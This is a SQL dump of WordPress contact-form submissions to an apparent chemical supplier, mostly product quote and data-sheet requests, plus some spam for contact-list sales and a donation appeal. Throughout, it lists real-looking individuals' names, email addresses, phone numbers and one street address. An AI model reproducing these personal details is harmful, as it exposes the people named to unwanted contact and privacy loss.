INSERT INTO `wp_postmeta` VALUES (31280, 3491, '_field_2', 'scott.rudolph@nrl.navy.mil'); 
INSERT INTO `wp_postmeta` VALUES (31281, 3491, '_field_8', '(202) 767-5400'); 
INSERT INTO `wp_postmeta` VALUES (31282, 3491, '_field_3', 'Hello,\r\nI am looking for any resin that you think might perform best (that is to say, have the lowest loss) at 10GHz. If you think that several materials may be suitable, I would be happy to provide measured electrical data (dielectric constant and loss tangent) for any samples you provide.\r\nThanks!'); 
INSERT INTO `wp_postmeta` VALUES (31283, 3491, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31284, 3491, '_sub_id', '3491'); 
INSERT INTO `wp_postmeta` VALUES (31285, 3492, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31286, 3492, '_seq_num', '259'); 
INSERT INTO `wp_postmeta` VALUES (31287, 3492, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31288, 3492, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31289, 3492, '_field_1', 'Jenny Collins'); 
INSERT INTO `wp_postmeta` VALUES (31290, 3492, '_field_10', 'Sublime Data Inc.'); 
INSERT INTO `wp_postmeta` VALUES (31291, 3492, '_field_2', 'jenny@sublimedata.us'); 
INSERT INTO `wp_postmeta` VALUES (31292, 3492, '_field_8', '5158616600'); 
INSERT INTO `wp_postmeta` VALUES (31293, 3492, '_field_3', 'Hi,\r\n\r\nWould you be interested in discussing about the updated database of Electric &amp; Hybrid Vehicles.\r\n\r\n\r\nDatabase includes complete contact details and verified email addresses of these Audience: Vehicle OEM, Drivetrain, Component Supplier, Design &amp; Simulation, Testing, Equipment Supplier, Testing &amp; Certification Services, Automation Equipment, Government, Battery Manufacturer, Raw Material Supplier, Power Management, Engineering Services, Consultancy, Financial Services, Research &amp; Development and many more.\r\n\r\nKindly let me know your target criteria so that we can provide you exact counts and cost based on your requirements.\r\n\r\nTarget Industry  :\r\nTarget Audience  :\r\nTarget Job Title :\r\nTarget Geography :\r\n\r\nBest Regards,\r\n\r\nJenny Collins\r\nMarketing Manager'); 
INSERT INTO `wp_postmeta` VALUES (31294, 3492, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31295, 3492, '_sub_id', '3492'); 
INSERT INTO `wp_postmeta` VALUES (31297, 3494, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31298, 3494, '_seq_num', '260'); 
INSERT INTO `wp_postmeta` VALUES (31299, 3494, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31300, 3494, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31301, 3494, '_field_1', 'GABRIELA CATALAN'); 
INSERT INTO `wp_postmeta` VALUES (31302, 3494, '_field_10', 'PERFORMANCE PLASTICS INC'); 
INSERT INTO `wp_postmeta` VALUES (31303, 3494, '_field_2', 'GCATALAN@PERF-PLASTICS.COM'); 
INSERT INTO `wp_postmeta` VALUES (31304, 3494, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (31305, 3494, '_field_3', 'PLEASE QUOTE THE FOLLOWING:\nEPON RESIN 828 CERTIFIED TO GC115AA2, 1 QT'); 
INSERT INTO `wp_postmeta` VALUES (31306, 3494, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31307, 3494, '_sub_id', '3494'); 
INSERT INTO `wp_postmeta` VALUES (31308, 3495, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (31309, 3495, '_seq_num', '202'); 
INSERT INTO `wp_postmeta` VALUES (31310, 3495, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31311, 3495, '_field_12', 'Carl Phillips'); 
INSERT INTO `wp_postmeta` VALUES (31312, 3495, '_field_13', 'Orbital ATK'); 
INSERT INTO `wp_postmeta` VALUES (31313, 3495, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (31314, 3495, '_field_14', 'tink.phillips@orbitalatk.com'); 
INSERT INTO `wp_postmeta` VALUES (31315, 3495, '_field_15', '(304) 726-5601'); 
INSERT INTO `wp_postmeta` VALUES (31316, 3495, '_field_16', 'We are working with our supplier, R. E. Darling of Tucson AZ, to verify that they are using your product, MS-136W, correctly and that we are then preparing the molded parts correctly.  We have had issues with similar products (not Miller-Stephenson) transferring cured mold release to molded EPDM parts.  What solvent is recommended to clean cured EPDM rubber to as to remove any uncured and cured MS-136W?'); 
INSERT INTO `wp_postmeta` VALUES (31317, 3495, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (31318, 3495, '_sub_id', '3495'); 
INSERT INTO `wp_postmeta` VALUES (31319, 3496, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31320, 3496, '_seq_num', '261'); 
INSERT INTO `wp_postmeta` VALUES (31321, 3496, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31322, 3496, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31323, 3496, '_field_1', 'Alice Miller'); 
INSERT INTO `wp_postmeta` VALUES (31324, 3496, '_field_10', 'Cross Link Marketing'); 
INSERT INTO `wp_postmeta` VALUES (31325, 3496, '_field_2', 'alice@crosslinkmarketing.com'); 
INSERT INTO `wp_postmeta` VALUES (31326, 3496, '_field_8', '(515) 861-6600'); 
INSERT INTO `wp_postmeta` VALUES (31327, 3496, '_field_3', 'Hi\r\n\r\nI hope you are the right person to discuss about the updated Database from all the industries.\r\n\r\nWe are B2B database provider. We have the complete contact details and verified email addresses of CEO&#039;s, CFO&#039;S, VP, Procurement Manager, Chief development officers, Presidents, Directors and all manner of key decision makers from various industries who might be interested in your products/services from below industries:\r\n\r\n	• Aerospace and Defense\r\n	• Automobiles\r\n	• Textiles and Apparel\r\n	• Building Materials\r\n	• Plumbing and HVAC Equipment\r\n	• Food and Beverage\r\n	• Medical Devices and Equipment\r\n	• Industrial Machinery and Equipment\r\n	• Plastic, Packaging and Containers\r\n	• Paper and Forest Products\r\n	• Agricultural Machinery\r\n	• Test and Measurement Equipment\r\n	• Boats &amp; Submarines\r\n	• Computers &amp; Electronics\r\n	• Household Appliances\r\n	• Office Machinery and more across the globe.\r\n\r\nKindly let me know your target criteria:\r\n\r\nTarget Industry :\r\nTarget Geography :\r\nTarget Job Title :\r\n\r\nBest Regards,\r\nAlice Miller\r\nMarketing Manager\r\n\r\nIf you do not wish to receive further Emails Kindly reply with &quot;Leave-Out&quot;.'); 
INSERT INTO `wp_postmeta` VALUES (31328, 3496, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31329, 3496, '_sub_id', '3496'); 
INSERT INTO `wp_postmeta` VALUES (31330, 3497, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31331, 3497, '_seq_num', '262'); 
INSERT INTO `wp_postmeta` VALUES (31332, 3497, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31333, 3497, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31334, 3497, '_field_1', 'Bradley Fiander'); 
INSERT INTO `wp_postmeta` VALUES (31335, 3497, '_field_10', 'MOOG Halifax (Focal Technologies)'); 
INSERT INTO `wp_postmeta` VALUES (31336, 3497, '_field_2', 'bfiander@moog.com'); 
INSERT INTO `wp_postmeta` VALUES (31337, 3497, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (31338, 3497, '_field_3', 'I am looking for a thing coating to seal loose glass fibers from shedding on machined part surfaces of a part made from G10 fiberglass epoxy laminate. The coating must have an operating temperature range of -40C to +160C.'); 
INSERT INTO `wp_postmeta` VALUES (31339, 3497, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31340, 3497, '_sub_id', '3497'); 
INSERT INTO `wp_postmeta` VALUES (31341, 3498, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31342, 3498, '_seq_num', '263'); 
INSERT INTO `wp_postmeta` VALUES (31343, 3498, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31344, 3498, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31345, 3498, '_field_1', 'robert latham'); 
INSERT INTO `wp_postmeta` VALUES (31346, 3498, '_field_10', 'uniweld products'); 
INSERT INTO `wp_postmeta` VALUES (31347, 3498, '_field_2', 'robert@uniweld.com'); 
INSERT INTO `wp_postmeta` VALUES (31348, 3498, '_field_8', '(954) 604-0289'); 
INSERT INTO `wp_postmeta` VALUES (31349, 3498, '_field_3', 'looking  for the msds for KRYTOX fg 40 and also pricing for this product in quanity as we are using this in an assembly process in our plant in a new product launch.\r\nthanks\r\n\r\nrobert latham'); 
INSERT INTO `wp_postmeta` VALUES (31350, 3498, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31351, 3498, '_sub_id', '3498'); 
INSERT INTO `wp_postmeta` VALUES (31352, 3499, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31353, 3499, '_seq_num', '264'); 
INSERT INTO `wp_postmeta` VALUES (31354, 3499, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31355, 3499, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31356, 3499, '_field_1', 'David Anthony'); 
INSERT INTO `wp_postmeta` VALUES (31357, 3499, '_field_10', 'Imperial College London'); 
INSERT INTO `wp_postmeta` VALUES (31358, 3499, '_field_2', 'danthony@ic.ac.uk'); 
INSERT INTO `wp_postmeta` VALUES (31359, 3499, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (31360, 3499, '_field_3', 'Hi Miller-Stephenson,\r\n\r\nI am interested in getting some HEXION EPIKURE W and HEXION EPON 862. I was wondering if I could be quoted for 5 litres (or if it is packaged in smaller quantities multiples of those) of resin with appropriate quantity of hardener, with delivery costs to the UK (London) and any associated lead times.\r\n\r\nAll the best,\r\n\r\nDave\r\n\r\nDr. David B. Anthony\r\n+44 20 7594 5857\r\n+44 77 1940 6315'); 
INSERT INTO `wp_postmeta` VALUES (31361, 3499, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31362, 3499, '_sub_id', '3499'); 
INSERT INTO `wp_postmeta` VALUES (31363, 3500, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31364, 3500, '_seq_num', '265'); 
INSERT INTO `wp_postmeta` VALUES (31365, 3500, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31366, 3500, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31367, 3500, '_field_1', 'WILLIAM M HOLLAND '); 
INSERT INTO `wp_postmeta` VALUES (31368, 3500, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (31369, 3500, '_field_2', '91MCBANE@GMAIL.COM'); 
INSERT INTO `wp_postmeta` VALUES (31370, 3500, '_field_8', '(904) 235-1730'); 
INSERT INTO `wp_postmeta` VALUES (31371, 3500, '_field_3', 'Hello archetchect/engineering/constructinon community I have been in the field for over 35 years and it&#039;s time for me to give it up due to a medical condition. As much as I hate to say this (pride) I am in trouble, I need your assistance. I am about to loose my home while waiting for social security benefits and I need to raise funds, if you can donate $1.00 or more to my WWW.GOFUNDME.COM/UM-PROPERTY-TAXES I would really apprecieate it and thank you in advance.\n\n\n\n\n  William M. Holland'); 
INSERT INTO `wp_postmeta` VALUES (31372, 3500, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31373, 3500, '_sub_id', '3500'); 
INSERT INTO `wp_postmeta` VALUES (31374, 3501, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (31375, 3501, '_seq_num', '203'); 
INSERT INTO `wp_postmeta` VALUES (31376, 3501, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31377, 3501, '_field_12', 'Jim  Sicard'); 
INSERT INTO `wp_postmeta` VALUES (31378, 3501, '_field_13', 'B&amp;E Precision Aircraft'); 
INSERT INTO `wp_postmeta` VALUES (31379, 3501, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (31380, 3501, '_field_14', 'jsicard@betool.com'); 
INSERT INTO `wp_postmeta` VALUES (31381, 3501, '_field_15', '(413) 998-1653'); 
INSERT INTO `wp_postmeta` VALUES (31382, 3501, '_field_16', 'We have and customer requirement to apply Miller-Stephenson compound S-122 to an assembly we are manufacturing for Hamilton Sundstrand.  It appears this compound may now be obsolete.  Please send information on if/where this can be purchased and let us know if there is a superseded compound that is now readily available.  \nThe materials that we are assembling are a stainless steel inserts into an aluminum Housing.'); 
INSERT INTO `wp_postmeta` VALUES (31383, 3501, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (31384, 3501, '_sub_id', '3501'); 
INSERT INTO `wp_postmeta` VALUES (31385, 3502, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31386, 3502, '_seq_num', '266'); 
INSERT INTO `wp_postmeta` VALUES (31387, 3502, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31388, 3502, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31389, 3502, '_field_1', 'SafeTec Compliance Systems'); 
INSERT INTO `wp_postmeta` VALUES (31390, 3502, '_field_10', 'SafeTec Compliance Systems'); 
INSERT INTO `wp_postmeta` VALUES (31391, 3502, '_field_2', 'bps16@bps.safetecmsds.com'); 
INSERT INTO `wp_postmeta` VALUES (31392, 3502, '_field_8', '(800) 613-0070'); 
INSERT INTO `wp_postmeta` VALUES (31393, 3502, '_field_3', 'Request for GHS Safety Data Sheet (GHS Retry 2015 - Des - Part 8)\r\n\r\n\r\nGreetings,\r\n\r\nSafeTec Compliance Systems, along with our customers, are working together to help update their\r\n(Material) Safety Data Sheet collection. We would greatly appreciate it if you could provide us with an\r\nupdated (M)SDS for the following product(s):\r\n\r\n10%. MURIATIC ACID(10)\r\n\r\nH B OPAQUE STAIN(3900)\r\n\r\nH B OPAQUE STAIN WHITE(3900)\r\n\r\nKRIL COAT-CUSTOM(5974)\r\n\r\nLACQUER THINNER(1232)\r\n\r\n\r\nAny additional information about the product, similar to those listed below, would be appreciated:\r\n\r\n• Change in Product Name \r\n• Change in Product Number \r\n• Change in Chemical Makeup of same product name/number \r\n• Discontinued \r\n• No longer the Manufacturer – New Manufacturer if known \r\n\r\nPlease email the requested (M)SDS(s) to: bps16@bps.safetecmsds.com\r\n\r\n\r\n\r\nor mail to: \r\n\r\nSafeTec Compliance Systems\r\n	Attn: Obtainment Requests\r\n	7700 NE Parkway Drive Suite 125\r\n	Vancouver, WA 98662\r\n\r\n\r\nFax: (267) 350-9332\r\n\r\nIf you have any questions or need to verify the validity of this request, please contact our\r\nSafeTec Obtainment Analyst at bps16@bps.safetecmsds.com or (800) 613-0070 Option 4. Thank you\r\nfor your time and assistance.\r\n\r\n\r\nSincerely,\r\n\r\nSafeTec Compliance Systems\r\nObtainment Analyst'); 
INSERT INTO `wp_postmeta` VALUES (31394, 3502, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31395, 3502, '_sub_id', '3502'); 
INSERT INTO `wp_postmeta` VALUES (31396, 3503, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31397, 3503, '_seq_num', '267'); 
INSERT INTO `wp_postmeta` VALUES (31398, 3503, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31399, 3503, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31400, 3503, '_field_1', 'Jamie Dors'); 
INSERT INTO `wp_postmeta` VALUES (31401, 3503, '_field_10', 'Ornge Air'); 
INSERT INTO `wp_postmeta` VALUES (31402, 3503, '_field_2', 'jdors@ornge.com'); 
INSERT INTO `wp_postmeta` VALUES (31403, 3503, '_field_8', '(647) 262-4402'); 
INSERT INTO `wp_postmeta` VALUES (31404, 3503, '_field_3', 'Could you provide a Canadian retailer of Vydax NRT960'); 
INSERT INTO `wp_postmeta` VALUES (31405, 3503, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31406, 3503, '_sub_id', '3503'); 
INSERT INTO `wp_postmeta` VALUES (31407, 3504, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31408, 3504, '_seq_num', '268'); 
INSERT INTO `wp_postmeta` VALUES (31409, 3504, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31410, 3504, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31411, 3504, '_field_1', 'Manjit Bhullar'); 
INSERT INTO `wp_postmeta` VALUES (31412, 3504, '_field_10', 'Cepheid'); 
INSERT INTO `wp_postmeta` VALUES (31413, 3504, '_field_2', 'manjit.bhullar@cepheid.com'); 
INSERT INTO `wp_postmeta` VALUES (31414, 3504, '_field_8', '(408) 400-8413'); 
INSERT INTO `wp_postmeta` VALUES (31415, 3504, '_field_3', 'Cepheid Part Number:	001-1856\nAgile Description:	GREASE,DUPONT KRYTOX GPL202,20KG  \nCertificate of Analysis\nor Certificate of Compliance	Certificate of Analysis from Dupont required with shipment. Must contain: Product description, material or part number, Lot number, and Manufacturing Date. A digital C of A is acceptable.\nPackaging:	5 gallon pail\nLabels:		Pail must be labeled with\n•	Manufacturer: Dupont\n•	Grease brand: Krytox \n•	Grease Type: GPL 202\n•	Lot number\n•	Quantity: 20kg\nQty. 50 per year.'); 
INSERT INTO `wp_postmeta` VALUES (31416, 3504, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31417, 3504, '_sub_id', '3504'); 
INSERT INTO `wp_postmeta` VALUES (31418, 3505, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31419, 3505, '_seq_num', '269'); 
INSERT INTO `wp_postmeta` VALUES (31420, 3505, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31421, 3505, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31422, 3505, '_field_1', 'Rose'); 
INSERT INTO `wp_postmeta` VALUES (31423, 3505, '_field_10', 'Changchun BRD Optical Co.,Ltd'); 
INSERT INTO `wp_postmeta` VALUES (31424, 3505, '_field_2', 'sales@brdoptical.com'); 
INSERT INTO `wp_postmeta` VALUES (31425, 3505, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (31426, 3505, '_field_3', '\r\n\r\n\r\n\r\nDear Sir/Madam,\r\n \r\nWe are optical components manufacturer in Changchun,China.I wonder if there is a chance to cooperate?\r\n\r\nI want to send this email to purchase or technology department ,If you are not , Could you please transfer this ? Many thanks for this.\r\n\r\nOur company mainly apply following products and services:\r\n \r\nOptical Components: spherical Lens, Mirrors, Dome lens , Filters,Prisms, Cylindrical Lens, Windows, Beam Splitters, Light guide,  and so on.\r\n \r\nInfrared Crystal: Silicon, Germanium, Zinc Selenium, Zinc Sulfide, Fused Silica, Sapphire ,BaF2, MgF2 and so on.\r\n \r\nCoating : Antireflective Coating (AR), Partial Reflective Coating (PR), Metallic\r\nHigh Reflective Coating(MHR), Dielectric High Reflecting Coating(DHR).\r\n \r\nWe are very confidence with our quality.90% of our products are export to foreign countries.We could supply ZYGO inspection for products. For some stock products,If It is suitable for you ,FREE SAMPLES can be sent on request. \r\n\r\nYours Sincerely\r\nRose Cao\r\nTechnical Sales Advisor\r\nEmail:sales@brdoptical.com\r\nwebsite：www.brdoptical.com \r\n'); 
INSERT INTO `wp_postmeta` VALUES (31427, 3505, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31428, 3505, '_sub_id', '3505'); 
INSERT INTO `wp_postmeta` VALUES (31429, 3506, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (31430, 3506, '_seq_num', '204'); 
INSERT INTO `wp_postmeta` VALUES (31431, 3506, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31432, 3506, '_field_12', 'Narasimhun Parthasarathy'); 
INSERT INTO `wp_postmeta` VALUES (31433, 3506, '_field_13', 'Textron India P Limited'); 
INSERT INTO `wp_postmeta` VALUES (31434, 3506, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (31435, 3506, '_field_14', 'nparthasarathy@textron.com'); 
INSERT INTO `wp_postmeta` VALUES (31436, 3506, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (31437, 3506, '_field_16', 'Hello! \r\nWe, at Textron Aviation, have been using MS-470C conformal coating for our PCB assemblies and we are looking MS-470S for our applications too. Will you be able to provide us the test data conforming to MIL-I-46058C Type UR and IPC-CC-830B for our review? Thanks!\r\n '); 
INSERT INTO `wp_postmeta` VALUES (31438, 3506, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (31439, 3506, '_sub_id', '3506'); 
INSERT INTO `wp_postmeta` VALUES (31440, 3507, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (31441, 3507, '_seq_num', '205'); 
INSERT INTO `wp_postmeta` VALUES (31442, 3507, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31443, 3507, '_field_12', 'robert hughes'); 
INSERT INTO `wp_postmeta` VALUES (31444, 3507, '_field_13', 'maclean power systems'); 
INSERT INTO `wp_postmeta` VALUES (31445, 3507, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (31446, 3507, '_field_14', 'rhughes@macleanpower.com'); 
INSERT INTO `wp_postmeta` VALUES (31447, 3507, '_field_15', '(423) 271-3647'); 
INSERT INTO `wp_postmeta` VALUES (31448, 3507, '_field_16', 'we currently use frekote fms-100 on our molds, we cast polymer concrete boxes and covers.\ntemp. 200 degrees. we are looking for a better sealer, any suggestions?'); 
INSERT INTO `wp_postmeta` VALUES (31449, 3507, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (31450, 3507, '_sub_id', '3507'); 
INSERT INTO `wp_postmeta` VALUES (31451, 3508, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31452, 3508, '_seq_num', '270'); 
INSERT INTO `wp_postmeta` VALUES (31453, 3508, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31454, 3508, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31455, 3508, '_field_1', 'robert hughes'); 
INSERT INTO `wp_postmeta` VALUES (31456, 3508, '_field_10', 'maclean power systems'); 
INSERT INTO `wp_postmeta` VALUES (31457, 3508, '_field_2', 'rhughes@macleanpower.com'); 
INSERT INTO `wp_postmeta` VALUES (31458, 3508, '_field_8', '(423) 271-3647'); 
INSERT INTO `wp_postmeta` VALUES (31459, 3508, '_field_3', ' attn: chris\naddress to send samples\nattn: Robert hughes at\nmaclean-highline\n2300 hwy. 11 north\nsweetwater, tn. 37874'); 
INSERT INTO `wp_postmeta` VALUES (31460, 3508, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31461, 3508, '_sub_id', '3508'); 
INSERT INTO `wp_postmeta` VALUES (31462, 3509, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31463, 3509, '_seq_num', '271'); 
INSERT INTO `wp_postmeta` VALUES (31464, 3509, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31465, 3509, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31466, 3509, '_field_1', 'kenneth Bowen'); 
INSERT INTO `wp_postmeta` VALUES (31467, 3509, '_field_10', 'Applied Avionics, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (31468, 3509, '_field_2', 'kenneth.bowen@appliedavionics.com'); 
INSERT INTO `wp_postmeta` VALUES (31469, 3509, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (31470, 3509, '_field_3', 'Please send the current SDS and TDS for DRY FILM LUBRICANT MS143H\nThanks\nKenneth'); 
INSERT INTO `wp_postmeta` VALUES (31471, 3509, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31472, 3509, '_sub_id', '3509'); 
INSERT INTO `wp_postmeta` VALUES (31473, 3511, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31474, 3511, '_seq_num', '272'); 
INSERT INTO `wp_postmeta` VALUES (31475, 3511, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31476, 3511, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31477, 3511, '_field_1', 'Jeff Dingman'); 
INSERT INTO `wp_postmeta` VALUES (31478, 3511, '_field_10', 'Stronghaven Container (Memphis)'); 
INSERT INTO `wp_postmeta` VALUES (31479, 3511, '_field_2', 'jdingman@stronghaven.com'); 
INSERT INTO `wp_postmeta` VALUES (31480, 3511, '_field_8', '(901) 346-1007'); 
INSERT INTO `wp_postmeta` VALUES (31481, 3511, '_field_3', 'I need to order a case of 226FG Krytox Corrugator grease. I was seeing if I could get a W-9 and whatever information you need from us so we can issue PO&#039;s.\r\n\r\nThank You.'); 
INSERT INTO `wp_postmeta` VALUES (31482, 3511, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31483, 3511, '_sub_id', '3511'); 
INSERT INTO `wp_postmeta` VALUES (31484, 3512, '_edit_lock', '1485352379:2'); 
INSERT INTO `wp_postmeta` VALUES (31485, 3512, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (31486, 3513, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (31487, 3513, '_seq_num', '206'); 
INSERT INTO `wp_postmeta` VALUES (31488, 3513, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31489, 3513, '_field_12', 'Steve Vargo'); 
INSERT INTO `wp_postmeta` VALUES (31490, 3513, '_field_13', 'Applied Avionics'); 
INSERT INTO `wp_postmeta` VALUES (31491, 3513, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (31492, 3513, '_field_14', 'steve.vargo@appliedavionics.com'); 
INSERT INTO `wp_postmeta` VALUES (31493, 3513, '_field_15', '(817) 445-1156'); 
INSERT INTO `wp_postmeta` VALUES (31494, 3513, '_field_16', 'Hello,\r\n\r\nWe are using Krytox MS143H to coat several copper parts.  All parts are cleaned for 15 minutes in an ultrasonic bath using 99% alcohol prior to coating.  One part, the same part, always has a heavier coating than the others.  The thick built up coating causes problems in the final assembly.  We know we can remove the MS143H if we let the Teflon settle out of the solution and use the clear solvent carrier to clean the built up coating from the parts.  Re-coating at this point looks like the other parts, and causes no problems.  Can you recommend a better cleaning method that will produce more consistent results.  Or, can I purchase the solvent carrier solution only without Teflon?  Please advise.\r\n\r\nRegards,\r\nSteve Vargo\r\nManufacturing Engineer\r\n\r\n       '); 
INSERT INTO `wp_postmeta` VALUES (31495, 3513, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (31496, 3513, '_sub_id', '3513'); 
INSERT INTO `wp_postmeta` VALUES (31497, 3514, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31498, 3514, '_seq_num', '273'); 
INSERT INTO `wp_postmeta` VALUES (31499, 3514, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31500, 3514, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31501, 3514, '_field_1', 'Ana Carvalho-Vieira'); 
INSERT INTO `wp_postmeta` VALUES (31502, 3514, '_field_10', 'Helenge Sul Indutrial SUpplies'); 
INSERT INTO `wp_postmeta` VALUES (31503, 3514, '_field_2', 'a.carvalho@helengesul.com'); 
INSERT INTO `wp_postmeta` VALUES (31504, 3514, '_field_8', '(321) 282-8486'); 
INSERT INTO `wp_postmeta` VALUES (31505, 3514, '_field_3', 'Please quote the following and advise lead time.\r\n1 pç GREASE DUPONT KRYTOX XHT-BDZ  8 Oz'); 
INSERT INTO `wp_postmeta` VALUES (31506, 3514, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31507, 3514, '_sub_id', '3514'); 
INSERT INTO `wp_postmeta` VALUES (31508, 3515, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31509, 3515, '_seq_num', '274'); 
INSERT INTO `wp_postmeta` VALUES (31510, 3515, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31511, 3515, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31512, 3515, '_field_1', 'Gena Morgan'); 
INSERT INTO `wp_postmeta` VALUES (31513, 3515, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (31514, 3515, '_field_2', 'gena@prospectingemaillists.com'); 
INSERT INTO `wp_postmeta` VALUES (31515, 3515, '_field_8', ''); 
